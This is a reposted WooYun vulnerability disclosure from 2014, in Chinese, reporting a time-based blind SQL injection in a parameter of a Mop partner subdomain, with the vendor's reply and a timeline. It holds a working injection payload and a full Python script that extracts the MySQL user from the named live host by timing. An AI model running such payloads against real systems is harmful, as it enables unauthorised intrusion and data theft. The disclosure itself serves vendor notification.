猫扑mop分站MySQL盲注(附猜解python脚本)

2015年7月27日23:02:11评论279 views字数 212阅读0分42秒阅读模式

摘要

2014-11-02：细节已通知厂商并且等待厂商处理中
2014-11-04：厂商已经确认，细节仅向厂商公开
2014-11-14：细节向核心白帽子及相关领域专家公开
2014-11-24：细节向普通白帽子公开
2014-12-04：细节向实习白帽子公开
2014-12-17：细节向公众公开

漏洞概要关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-81743

漏洞标题：猫扑mop分站MySQL盲注(附猜解python脚本)

漏洞作者： lijiejie

提交时间： 2014-11-02 16:40

公开时间： 2014-12-17 16:42

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

6人收藏

漏洞详情

披露状态：

简要描述：

猫扑mop分站MySQL盲注

详细说明：

注入点:

code 区域

POST http://51auto.mop.com/hclist_/
 
 Family=aaa'+(select(0)from(select(sleep(10)))v)+'bbb&file1=1&happyUserId=-

参数Family可注入。

漏洞证明：

MySQL user:

脚本附上：

code 区域

#encoding=utf-8
 import httplib
 import time
 import string
 import sys
 import random
 import hashlib
 import urllib
 
 
 headers = {
     'Content-Type': 'application/x-www-form-urlencoded',
     'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
 }
 
 payloads = list(string.ascii_lowercase)
 for i in range(0,10):
     payloads.append(str(i))
 payloads += ['@','_', '.']
 
 print '[%s] Start to retrive MySQL User' % time.strftime('%H:%M:%S', time.localtime())
 user = ''
 for i in range(1, 25):
     found=False
     while found==False:
         for payload in payloads:
             timeout_count = 0
             for j in range(1,3):   # 2 times to confirm
                 try:
                     params = {
                         'Family': "aaa'+(select(0)from(select(sleep(ascii(mid(user()from(%s)for(1)))=%s)))v)+'bbb" % (i, ord(payload)),
                         'file1': 1,
                         'happyUserId': '-'
                     }
                     params['Family'] = params['Family'] * 5
                     body = urllib.urlencode(params)
                     conn = httplib.HTTPConnection('51auto.mop.com', timeout=5)
                     conn.request(method='POST',
                                  url='/hclist_/',
                                  body=body,
                                  headers=headers)
                     conn.getresponse().read()
                     conn.close()
                     print '.',
                     break
                 except Exception, e:
                     timeout_count += 1
                     time.sleep(0.01)
             if timeout_count == 2:
                 user += payload
                 print '/n[In progress] now user is %s' % user
                 found = True
                 break
         
 print '/nFinally, MySQL user is', user

修复方案：

参数过滤

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2014-11-04 12:37

厂商回复：

谢谢，这个网站实际上不是猫扑的，有猫扑的二级域名是因为以前合作过，我们会想办法尽量通知对方，感谢

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-02 21:52 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

0

大牛的猪肉真牛。

1# 回复此人

漏洞概要 关注数(19) 关注此漏洞